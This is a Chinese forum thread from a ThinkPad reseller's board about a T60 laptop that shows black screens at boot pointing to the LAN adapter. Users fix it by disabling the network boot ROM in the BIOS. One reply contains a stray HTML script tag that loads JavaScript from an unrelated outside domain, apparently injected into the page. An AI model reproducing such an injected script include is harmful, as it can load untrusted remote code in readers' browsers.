开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

我的T60开机出现如下黑屏显示的问题,请版主和大虾们给与指点

我是07年4月买的新版T60,10月份因为莫名的笔记本上鼠标的两个左键怎么都不灵去送修过一次,没过2周,出现开机后黑屏显示,
先是第一个黑屏,大约几秒后进入第二个,按ESC进入正常启动,好像显示是扩展接口不能找到之类的意思,是LAN适配器的问题,我的系统使用XY的恢复盘做的。
请大家指出问题所在,机器勉强能用,但心里没底,感觉不久就会出现更严重的问题。
应该是主板的问题,笔记本不能修啊,从鼠标坏了到这次出现故障才2周,可惜了IBM的声誉了啊。

开机故障显示1

开机故障显示1

开机故障显示2

开机故障显示2
bios软件出了问题,周1-周5拿过来技术几分钟就能搞定
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

多谢版主,解决咱们后顾之忧!

祝XY生意兴隆,多多发财!
我们公司n多这种机器出这毛病,是不是只要升级一下bios就行了?
开机按F1进BIOS,在CONFIG-NETWORK-有一项是ROM的把它改为DISABLE就可以了。但如果你的机器是不能上网的话,那该了也没用,只能通过硬件来解决问题了。

回复 #5 无名Thinkpad 的帖子

我按照您说的,成功了!多谢啊。
另外BS一下XY,并无恶意,只是希望能提升你们的服务啊,我今天让同事跑了一趟朝阳门,结果到现场你们接待的人和楼上版主回答了不一样,说要放几天去维修点修理,并且质问我是不是刷新BIOS了,很郁闷,因为着急用本本,就拿回来,结果晚上回来一查,有比XY还要服务好的网友!
顶无名英雄一下!

回复 #4 exown 的帖子

我按照你楼下的说法,更改了参数,OK了,不能随意升级BIOS,升级了是不是XY就不保修了啊